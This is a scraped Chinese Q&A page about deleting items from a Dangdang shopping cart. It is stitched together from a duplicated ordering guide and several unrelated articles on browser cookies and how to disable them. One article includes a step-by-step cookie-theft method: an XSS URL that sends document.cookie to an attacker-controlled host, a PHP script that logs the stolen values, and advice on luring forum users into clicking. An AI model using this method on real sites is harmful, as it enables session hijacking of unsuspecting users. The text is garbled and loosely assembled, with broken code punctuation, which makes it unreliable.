为什么当当网上购物车里的东西删不下去
为什么当当网上购物车里的东西删不下去
09-09-19 &匿名提问
注册，登陆，放入购物车，确认有正品也有盗版，没办法，谁让它折扣低呢，还有卓越网，也是有正品有盗版。这两个网的价格可以比较一下。
1、搜索商品：
当当网为您提供了方便快捷的商品搜索功能 （1）您可以通过在首页输入关键字的方法来搜索您想要购买的商品。 （2）您还可以通过当当的分类导航栏来找到您想要购买的商品分类，根据分类找到您的商品。 （3）观看搜索商品演示。 2、放入购物车：
在您想要购买的商品的详情页点击“购买”，商品会添加到您的购物车中；您还可以继续挑选商品放入购物车，一起结算。 （1）在购物车中，每件商品的订购数量默认为一件，如果您想购买多件商品，可修改购买数量。 （2）如果您在购物车中删除了某件商品，该商品会暂时放在下面；想重新购买这件商品，点击“恢复”，就可以将它重新放入购物车了。 （3）购物车页面上方的商品是当当网根据您订购的商品为您作出的推荐，如果有您喜爱的商品，您可以直接点击“购买”。 3、登陆注册：
老顾客，请输入您的E-mail地址或昵称、密码、验证码，点击“登录”；新顾客，请点击“还没有注册”，按提示完成注册。  4、选择订单：
如果购物车中有两个以上（含两个）的商家的商品，您需要分别提交每个商家的订单。 5、填写收货人信息\选择送货方式\选择付款方式： （1）请您填写真实的收货人姓名、所在地区、详细的收货地址、邮编和联系电话。 （2）当当网提供的送货方式有普通快递送货上门、加急快递送货上门、普通邮递、特快专递；查看快递的送货范围、时间及费用。 （3）当当网为您提供了网上支付、货到付款、邮局汇款、银行转账等多种支付方式。 6、订单确认：
填写完以上信息之后，请仔细核对；确认无误后，请点击“提交订单”按钮提交订单。生成订单号后，表明您已经成功提交了订单。
 温馨提示： 1、您一旦选择使用礼券并点击“确定使用”后，将无法取消使用礼券，如果您取消了该订单，礼券无法恢复。 2、如果您将商品放入购物车但尚未提交订单，购物车中商品的价格、优惠政策、配送时间等信息可能发生变化。因此，您保留在 购物车中的商品最终成交信息将以您成功提交订单时当当网公布的信息为准。 &br/&&br/&&font color=#0556A3&参考文献：&/font&
请登录后再发表评论!
注册，登陆，放入购物车，确认有正品也有盗版，没办法，谁让它折扣低呢，还有卓越网，也是有正品有盗版。这两个网的价格可以比较一下。 1、搜索商品： 当当网为您提供了方便快捷的商品搜索功能 （1）您可以通过在首页输入关键字的方法来搜索您想要购买的商品。 （2）您还可以通过当当的分类导航栏来找到您想要购买的商品分类，根据分类找到您的商品。 （3）观看搜索商品演示。 2、放入购物车： 在您想要购买的商品的详情页点击“购买”，商品会添加到您的购物车中；您还可以继续挑选商品放入购物车，一起结算。 （1）在购物车中，每件商品的订购数量默认为一件，如果您想购买多件商品，可修改购买数量。（2）如果您在购物车中删除了某件商品，该商品会暂时放在下面；想重新购买这件商品，点击“恢复”，就可以将它重新放入购物车了。（3）购物车页面上方的商品是当当网根据您订购的商品为您作出的推荐，如果有您喜爱的商品，您可以直接点击“购买”。3、登陆注册： 老顾客，请输入您的E-mail地址或昵称、密码、验证码，点击“登录”；新顾客，请点击“还没有注册”，按提示完成注册。  4、选择订单：如果购物车中有两个以上（含两个）的商家的商品，您需要分别提交每个商家的订单。 5、填写收货人信息\选择送货方式\选择付款方式：（1）请您填写真实的收货人姓名、所在地区、详细的收货地址、邮编和联系电话。（2）当当网提供的送货方式有普通快递送货上门、加急快递送货上门、普通邮递、特快专递；查看快递的送货范围、时间及费用。 （3）当当网为您提供了网上支付、货到付款、邮局汇款、银行转账等多种支付方式。6、订单确认：填写完以上信息之后，请仔细核对；确认无误后，请点击“提交订单”按钮提交订单。生成订单号后，表明您已经成功提交了订单。
温馨提示：1、您一旦选择使用礼券并点击“确定使用”后，将无法取消使用礼券，如果您取消了该订单，礼券无法恢复。2、如果您将商品放入购物车但尚未提交订单，购物车中商品的价格、优惠政策、配送时间等信息可能发生变化。因此，您保留在 购物车中的商品最终成交信息将以您成功提交订单时当当网公布的信息为准。&br/&&br/&&font color=#0556A3&参考文献：&/font&
请登录后再发表评论!
正文  ?cookie实际上是一些小的数据包，里面包含着关于你网上冲浪习惯的信息，可以方便你以后的操作，但随后就为因特网上了解cookie的站点所知。正因如此，我们还是有必要学会禁用cookie，以保证上网的安全。以下笔者介绍禁用cookie的三种方法，你可根据需要选择使用。 ??一、ie选项法 ??1、启动ie； ??2、在“工具”菜单上，单击“internet选项”，打开“internet选项”对话框； ??3、单击“隐私”选项卡，将滑块上移到更高的隐私级别。如果移动到最顶端则是选择“阻止所有的cookie”，此时系统将阻止所有网站的cookie，而且网站不能读取计算机上已有的cookie； ??4、单击“确定”按钮。 ??二、属性设置法??当然，上述的“ie选项法”笔者是在ie6中操作完成，如果你用的是ie5，那么请在“internet选项”对话框中“安全”选项卡上进行设置，在ie4中又有所不同。而下述的“属性设置法”把保存cookie的文件夹设置为“只读”属性，从而网站也就无法向其中写入cookie信息了。该法适用于各种版本的ie。 ??1、启动“windows资源管理器”； ??2、找到保存cookie的文件夹。使用windows版本不同，保存cookie的文件夹会有所不同。比如，在windows xp中，该文件夹为“c:documents and settings用户名cookies”文件夹；在windows 98中，是“c:windowscookies”文件夹； ?　3、右键单击该文件夹，再单击“属性”，打开文件夹属性对话框，选中“只读”复选框，指定此文件夹中的文件为只读属性，只读意味着文件不能被更改或意外删除； ??4、单击“确定”按钮。??三、注册表法??“属性设置法”实际上也有缺陷，就是网站照样可以读取计算机上已有的cookie。而且有一些特殊cookie不是以文本文件形式存在，而是保存在内存中。这类cookie通常是用户在访问某些特殊网站时，由系统自动在内存中生成，一旦访问者离开该网站又自动将cookie从内存中删除。上述两法对这些cookie就无能为力了，而“注册表法”可以弥补这些不足。 ??1、单击“开始”菜单，再单击“运行”，然后在“打开”框中键入“regedit”，单击“确定”按钮，打开“注册表编辑器”窗口； ??2、依次展开“hkey_local_machinesoftwaremicrosoftwindowscurrentversioninternet settingscachespecial pathscookies”分支，右键单击“cookies”，然后单击快捷菜单中的“删除”命令，当系统提示确认删除时，请单击“是”按钮； ??3、关闭“注册表编辑器”窗口 ??为了防止一些网站将cookie文件放到你的计算机中，除了如上所述手动进行设置外，还有一个简便的方法是安装软件来保护你的cookie文件。这类软件比较多，你可以到各大软件下载站点去下载。比如，complete cleanup software trail就是一款专门用来清除各种cookie的软件，它的功能十分强大，不但能让已保存在计算机中的cookie无处藏身，也能将用户浏览网页时保存在硬盘缓存中的垃圾信息清除。
Cookie 一些网站会在您的计算机上的以小文本文件存储信息。这种文件称为 Cookie。 有几种类型的 Cookie，您可以选择是否允许在计算机上保存一部分、不保存或保存所有的 Cookie。如果不允许 Cookie，就不能查看某些站点或者利用自定义功能（例如本地新闻和天气，或者股票查询）。 如何使用 Cookie Cookie 是由 Internet 站点创建的、将信息存储在计算机上的文件，例如访问站点时的首选项。例如，如果您在某家航空公司的站点上查阅了航班时刻表，该站点可能就创建了包含您的旅行计划的 Cookie。也可能只记录了您在该站点上曾经访问过的页面，由此帮助您下次访问该站点时自定义查看。 Cookies 也可以存储个人可识别信息。个人可识别信息是可以用来识别或联系您的信息，例如您的姓名、电子邮件地址、家庭或工作单位地址，或者电话号码。然而，网站只能访问您提供的个人可识别信息。例如，除非您提供电子邮件名称，否则网站将不能确定您的电子邮件名称。另外，网站不能访问计算机上的其他信息。 一旦将 cookie 保存在计算机上，则只有创建该 cookie 的网站才能读取它。 使用 Cookie 时的选择 Internet Explorer 允许使用 Cookie；但是，可以更改隐私设置来指定 Internet Explorer 将 Cookie 放到计算机上之前给出提示（让您决定允许或阻止 Cookie）；或者防止 Internet Explorer 接受任何 Cookie。 可以删除的，只是以后你再访问某些网站的时候用户名密码什么的需要重新输入，网站不会记住了。微软 Internet Explorer工具 & Internet选项 & 隐私页调节滑块或者点击“高级”，进行设置. 你的问题很可能就出在这个滑块的位置上
简单的说，它就是一个临时的文件夹，你删掉之后，再次浏览网页的时候会自动创建！它是用来存放一些浏览网页时的临时文件的，目的是下次访问同一个网页的时候速度会快一点！
1.Cookies能解决什么问题，也是它的功能  记录你所操作的东西！在IE浏览器的属性里所查看的Internet页存储在特定的文件夹中，这样可以提高以后浏览的速度 2.Cookies包括什么内容 Cookies是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存，或是从客户端的硬盘读取数据的一种技术。Cookies是当你浏览某网站时，由Web服务器置于你硬盘上的一个非常小的文本文件，它可以记录你的用户ID、密码、浏览过的网页、停留的时间等信息。当你再次来到该网站时，网站通过读取Cookies，得知你的相关信息，就可以做出相应的动作，如在页面显示欢迎你的标语，或者让你不用输入ID、密码就直接登录等等。 从本质上讲，它可以看作是你的身份证。但Cookies不能作为代码执行，也不会传送病毒，且为你所专有，并只能由提供它的服务器来读取。保存的信息片断以“名/值”对(name-value pairs)的形式储存，一个“名/值”对仅仅是一条命名的数据。一个网站只能取得它放在你的电脑中的信息，它无法从其它的Cookies文件中取得信息，也无法得到你的电脑上的其它任何东西。 Cookies中的内容大多数经过了加密处理，因此一般用户看来只是一些毫无意义的字母数字组合，只有服务器的CGI处理程序才知道它们真正的含义。 3.Cookies的存储位置？ 由于Cookies是我们浏览的网站传输到用户计算机硬盘中的文本文件或内存中的数据，因此它在硬盘中存放的位置与使用的操作系统和浏览器密切相关。在Windows 9X系统计算机中，Cookies文件的存放位置为C:WindowsCookies，在Windows NT/2000/XP的计算机中，Cookies文件的存放位置为C:\Documents and Settings\用户名\Cookies。
Cookie，有时也用其复数形式Cookies，指某些网站为了辨别用户身份而储存在用户本地终端上的数据（通常经过加密）。定义于RFC2109。它是网景公司的前雇员Lou Montulli在1993年3月的发明。用途服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息，以判断在HTTP传输中的状态。Cookies最典型的应用是判定注册用户是否已经登录网站，用户可能会得到提示，是否在下一次进入此网站时保留用户信息以便简化登录手续，这些都是Cookies的功用。另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品，这些信息都会写入Cookies，以便在最后付款时提取信息。使用和禁用Cookie用户可以改变浏览器的设置，以使用或者禁用Cookies。微软 Internet Explorer工具 & Internet选项 & 隐私页调节滑块或者点击“高级”，进行设置. Mozilla Firefox工具 & 选项 & 隐私(注: 在Linux版本中，可能会是如下操作：编辑 & 属性 & 隐私 ， 而Mac则是：Firefox & 属性 & 隐私)设置Cookies选项 设定阻止/允许的各个域内Cookie 查看Cookies管理窗口，检查现存Cookie信息，选择删除或者阻止它们 苹果计算机 SafariSafari & 预置 & 安全标签选择以下的选项 总是 接受 Cookies 永不 接受 Cookies 接受 Cookies 仅从您浏览的站点 (例如，不接受来自其它站点的广告) 预设的选项. 您可以显示所有驻留在您浏览器中的 cookies，也可随时将它们之一删除。Konqueror如果没有设置cookie列表，请记住在域名前面加入“.”，，否则百度将不会读取cookie(针对KDE 3.3)。 生存周期Cookie可以保持登录信息到用户下次与服务器的会话，换句话说，下次访问同一网站时，用户会发现不必输入用户名和密码就已经登录了（当然，不排除用户手工删除Cookie）。而还有一些Cookie在用户退出会话的时候就被删除了，这样可以有效保护个人隐私。识别功能如果在一台计算机中安装多个浏览器，每个浏览器都会独立的空间存放cookie。因为cookie中不但可以确认用户，还能包含计算机和浏览器的信息，所以一个用户用不同的浏览器登录或者用不同的计算机登录，都会得到不同的cookie信息，另一方面，对于在同一台计算机上使用同一浏览器的多用户群，cookie不会区分他们的身份，除非他们使用不同的用户名登录。反对cookies者一些人反对cookie在网络中的应用，他们的理由如下：识别不精确参见上面的识别功能隐私，安全和广告Cookies在某种程度上说已经严重危及用户的隐私和安全。其中的一种方法是：一些公司的高层人员为了某种目的（譬如市场调研）而访问了从未去过的网站（通过搜索引擎查到的），而这些网站包含了一种叫做网页臭虫的图片，该图片透明，且只有一个象素大小（以便隐藏），它们的作用是将所有访问过此页面的计算机写入cookie。而后，电子商务网站将读取这些cookie信息，并寻找写入这些cookie的网站，随即发送包含了针对这个网站的相关产品广告的垃圾邮件给这些高级人员。因为更具有针对性，使得这套系统行之有效，收到邮件的客户或多或少表现出对产品的兴趣。这些站点一旦写入cookie并使其运作，就可以从电子商务网站那里获得报酬，以维系网站的生存。鉴于隐藏的危害性，瑞典已经通过对cookie立法，要求利用cookie的网站必须说明cookie的属性，并且指导用户如何禁用cookie。偷窃Cookie和脚本攻击尽管cookie没有病毒那么危险，但它仍包含了一些敏感信息：用户名，计算机名，使用的浏览器和曾经访问的网站。用户不希望这些内容泄漏出去，尤其是当其中还包含有私人信息的时候。这并非危言耸听，一种名为Cross site scripting的工具可以达到此目的。在受到Cross site scripting攻击时，cookie盗贼和cookie毒药将窃取内容。一旦cookie落入攻击者手中，它将会重现其价值。cookie盗贼：搜集用户cookie并发给攻击者的黑客。攻击者将利用cookie信息通过合法手段进入用户帐户。 cookie毒药：利用安全机制，攻击者加入代码从而改写cookie内容，以便持续攻击。 Cookies的替代品鉴于cookie的局限和反对者的声音，有如下一些替代方法：Brownie方案，是一项开放源代码工程，由SourceForge发起。Brownie曾被用以共享在不同域中的接入，而cookies则被构想成单一域中的接入。这项方案已经停止开发。 P3P，用以让用户获得更多控制个人隐私权利的协议。在浏览网站时，它类似于cookie。 在与服务器传输数据时，通过在地址后面添加唯一查询串，让服务器识别是否合法用户，也可以避免使用cookie。 cookie的具体含义cookie 历来指就着牛奶一起吃的点心。然而，在因特网内，“cookie”这个字有了完全不同的意思。那么“cookie”到底是什么呢？“Cookie”是小量信息，由网络服务器发送出来以存储在网络浏览器上，从而下次这位独一无二的访客又回到该网络服务器时，可从该浏览器读回此信息。这是很有用的，让浏览器记住这位访客的特定信息，如上次访问的位置、花费的时间或用户首选项（如样式表）。Cookie 是个存储在浏览器目录的文本文件，当浏览器运行时，存储在 RAM 中。一旦阁下从该网站或网络服务器退出，Cookie 也可存储在计算机的硬驱上。I3I.net的打算是，当访客结束其浏览器对话时，即终止I3I.net的所有 cookie。 Cookie 有哪些用途？ Cookie 的用途之一是存储用户在特定网站上的密码和 ID。另外，也用于存储起始页的首选项。在提供个人化查看的网站上，将要求阁下的网络浏览器利用阁下计算机硬驱上的少量空间来储存这些首选项。这样，每次阁下登录该网站时，阁下的浏览器将检查阁下是否就该唯一的服务器有任何预先定义的首选项（cookie）。如果有的话，浏览器将此 cookie 随阁下对网页的请求一起发送给服务器。Microsoft 和 Netscape 使用 cookie 在其网站上创建个人起始页。各家公司利用 cookie 的一般用途包括：在线定货系统、网站个人化和网站跟踪。 网站个人化是 cookie 最有益的用途之一。例如，当谁来到 CNN 网站，但并不想查看任何商务新闻。网站允许他将该项选为选项。从那时起（或者直到 cookie 逾期），他在访问 CNN 网页时将不会读到商务新闻。 这些 Cookie 是如何起作用的？ 文档的 HTML 代码中的命令行告诉浏览器设置某一名称或数值的 cookie。以下是用来设置 cookie 脚本的一个普通实例。 Set-Cookie: name = VALUE; expires = DATE; path = PATH; domain = DOMAIN_NAME; 那么安全性如何？HTTP Cookie 不能用来从阁下的硬驱上检索个人数据、放置病毒、得到阁下的电子邮件地址或偷窃有关阁下身份的敏感信息；然而，HTTP Cookie 可用来跟踪阁下在特定网站上的所到之处。不使用 cookie 就很难进行网站跟踪。 至于其他一切与因特网有关的事，如同阁下所希望的那样是匿名的。没有网站知道阁下是谁，除非阁下自己透露给网站。同时，cookie 只是为了更好地了解使用模式并改进网站访客的效率而采用的一个网站跟踪统计手段而已。 如果网站设计师旨在使网页能与访客更具互动作用，或者若设计师计划让访客自定义网站的外观，则就需要使用 cookie。而且，如果阁下想要网站在某些情况下改变其外观，cookie 则提供了一条快速、容易的途径，让阁下的 HTML 页面按需要而改变。最新型的服务器使用 cookie 有助于数据库的互动性，进而改进网站的整体互动性。Cookie在英文中是小甜品的意思，而这个词我们总能在浏览器中看到，食品怎么会跟浏览器扯上关系呢？在你浏览以前登陆过的网站时可能会在网页中出现：你好XX，感觉很亲切，就好像是吃了一个小甜品一样。这其实是通过访问你主机里边的一个文件来实现的，因此这个文件也就被称为了Cookie。想全面了解Cookie吗？看看下文吧！　　 一.了解Cookie 适用对象：初级读者　　 Cookie是当你浏览某网站时，网站存储在你机器上的一个小文本文件，它记录了你的用户ID，密码、浏览过的网页、停留的时间等信息，当你再次来到该网站时，网站通过读取Cookie，得知你的相关信息，就可以做出相应的动作，如在页面显示欢迎你的标语，或者让你不用输入ID、密码就直接登录等等。你可以在IE的“工具/Internet选项”的“常规”选项卡中，选择“设置/查看文件”，查看所有保存到你电脑里的Cookie。这些文件通常是以user@domain格式命名的，user是你的本地用户名，domain是所访问的网站的域名。如果你使用NetsCape浏览器，则存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面，与IE不同的是，NETSCAPE是使用一个Cookie 文件记录所有网站的Cookies。　　 为了保证上网安全我们需要对Cookie进行适当设置。打开“工具/Internet选项”中的“隐私”选项卡（注意该设置只在IE6.0中存在，其他版本IE可以在“工具/Internet选项”的“安全”标签中单击“自定义级别”按钮，进行简单调整），调整Cookie的安全级别。通常情况，可以将滑块调整到“中高”或者“高”的位置。多数的论坛站点需要使用Cookie信息，如果你从来不去这些地方，可以将安全级调到“阻止所有Cookies”。如果只是为了禁止个别网站的Cookie，可以单击“编辑”按钮，将要屏蔽的网站添加到列表中。在“高级”按钮选项中，你可以对第一方Cookie和第三方的Cookie进行设置，第一方Cookie是你正在浏览的网站的Cookie，第三方Cookie非正在浏览的网站发给你的Cookie，通常要对第三方Cookie选择“拒绝”，如图1。你如果需要保存Cookie，可以使用IE的“导入导出”功能，打开“文件/导入导出”，按提示操作即可。　　 Cookie中的内容大多数经过了加密处理，因此在我们看来只是一些毫无意义的字母数字组合，只有服务器的CGI处理程序才知道它们真正的含义。通过一些软件我们可以查看到更多的内容，使用Cookie Pal软件查看到的Cookie信息，如图2所示。它为我们提供了Server、Expires、Name、value等选项的内容。其中，Server是存储Cookie的网站，Expires记录了Cookie的时间和生命期，Name和value字段则是具体的数据　 二、Cookie的传递流程 适用对象：中级读者当在浏览器地址栏中键入了一个Web站点的URL，浏览器会向该Web站点发送一个读取网页的请求，并将结果在显示器上显示。这时该网页在你的电脑上寻找Amazon网站设置的Cookie文件，如果找到，浏览器会把Cookie文件中的数据连同前面输入的URL一同发送到Amazon服务器。服务器收到Cookie数据，就会在他的数据库中检索你的ID，你的购物记录、个人喜好等信息，并记录下新的内容，增加到数据库和Cookie文件中去。如果没有检测到Cookie或者你的Cookie信息与数据库中的信息不符合，则说明你是第一次浏览该网站，服务器的CGI程序将为你创建新的ID信息，并保存到数据库中。Cookie是利用了网页代码中的HTTP头信息进行传递的，浏览器的每一次网页请求，都可以伴随Cookie传递，例如，浏览器的打开或刷新网页操作。服务器将Cookie添加到网页的HTTP头信息中，伴随网页数据传回到你的浏览器，浏览器会根据你电脑中的Cookie设置选择是否保存这些数据。如果浏览器不允许Cookie保存，则关掉浏览器后，这些数据就消失。Cookie在电脑上保存的时间是不一样的，这些都是由服务器的设置不同决定得。Cookie有一个Expires（有效期）属性，这个属性决定了Cookie的保存时间，服务器可以通过设定Expires字段的数值，来改变Cookie的保存时间。如果不设置该属性，那么Cookie只在浏览网页期间有效，关闭浏览器，这些Cookie自动消失，绝大多数网站属于这种情况。通常情况下，Cookie包含Server、Expires、Name、value这几个字段，其中对服务器有用的只是Name和value字段，Expires等字段的内容仅仅是为了告诉浏览器如何处理这些Cookies。　　 三、Cookie的编程实现 适用对象：高级读者　　 多数网页编程语言都提供了对Cookie的支持。如javascript、VBScript、Delphi、ASP、SQL、PHP、C#等。在这些面向对象的编程语言中，对Cookie的编程利用基本上是相似的，大体过程为：先创建一个Cookie对象（Object），然后利用控制函数对Cookie进行赋值、读取、写入等操作。那么如何通过代码来获取其他用户Cookie中的敏感信息？下面进行简单的介绍。该方法主要有两步，首先要定位你需要收集Cookie的网站，并对其进行分析，并构造URL；然后编制收集Cookie的PHP代码，并将其放到你可以控制的网站上，当不知情者单击了你构造的URL后可以执行该PHP代码。下面我们看具体的实现过程。　　 1.分析并构造URL　　 首先打开我们要收集Cookie的网站，这里假设是，登陆网站输入用户名“”（不含引号），对数据进行分析抓包，得到形如“”的代码，将“”更换为“”再试；如果执行成功，就开始构造URL：“?\&%2Bdocuments.cookie)&passwd=&ok.x=28&ok.y=6& target=&_blank&& ;... swd=&ok.x=28&ok.y=6”。其中http:///就是你能够控制的某台主机上的一个脚本。需要注意的是“%2B”为符号“+”的URL编码，因为“+”将被作为空格处理。该URL就可以在论坛中发布，诱使别人点击了。2.编制PHP脚本　　 该脚本的作用就是收集Cookie文件，具体内容如下：$info = getenv(&QUERY_STRING&;if ($info) {$fp = fopen(&info.txt&,&a&;fwrite($fp,$info.&\n&;fclose($fp);}header(&Location: \&;?&四、Cookie的安全问题 适用对象：所有希望上网安全的读者　　 1.Cookie欺骗　　 Cookie记录着用户的帐户ID、密码之类的信息，如果在网上传递，通常使用的是MD5方法加密。这样经过加密处理后的信息，即使被网络上一些别有用心的人截获，也看不懂，因为他看到的只是一些无意义的字母和数字。然而，现在遇到的问题是，截获Cookie的人不需要知道这些字符串的含义，他们只要把别人的Cookie向服务器提交，并且能够通过验证，他们就可以冒充受害人的身份，登陆网站。这种方法叫做Cookie欺骗。Cookie欺骗实现的前提条件是服务器的验证程序存在漏洞，并且冒充者要获得被冒充的人的Cookie信息。目前网站的验证程序要排除所有非法登录是非常困难的，例如，编写验证程序使用的语言可能存在漏洞。而且要获得别人Cookie是很容易的，用支持Cookie的语言编写一小段代码就可以实现（具体方法见三），只要把这段代码放到网络里，那么所有人的Cookie都能够被收集。如果一个论坛允许HTML代码或者允许使用Flash标签就可以利用这些技术收集Cookie的代码放到论坛里，然后给帖子取一个吸引人的主题，写上有趣的内容，很快就可以收集到大量的Cookie。在论坛上，有许多人的密码就被这种方法盗去的。至于如何防范，目前还没有特效药，我们也只能使用通常的防护方法，不要在论坛里使用重要的密码，也不要使用IE自动保存密码的功能，以及尽量不登陆不了解底细的网站。　　 2.Flash的代码隐患Flash中有一个getURL（）函数，Flash可以利用这个函数自动打开指定的网页。因此它可能把你引向一个包含恶意代码的网站。打个比方，当你在自己电脑上欣赏精美的Flash动画时，动画帧里的代码可能已经悄悄地连上网，并打开了一个极小的包含有特殊代码的页面。这个页面可以收集你的Cookie、也可以做一些其他的事情，比如在你的机器上种植木马甚至格式化你的硬盘等等。对于Flash的这种行为，网站是无法禁止的，因为这是Flash文件的内部行为。我们所能做到的，如果是在本地浏览尽量打开防火墙，如果防火墙提示的向外发送的数据包并不为你知悉，最好禁止。如果是在Internet上欣赏，最好找一些知名的大网站。
请登录后再发表评论!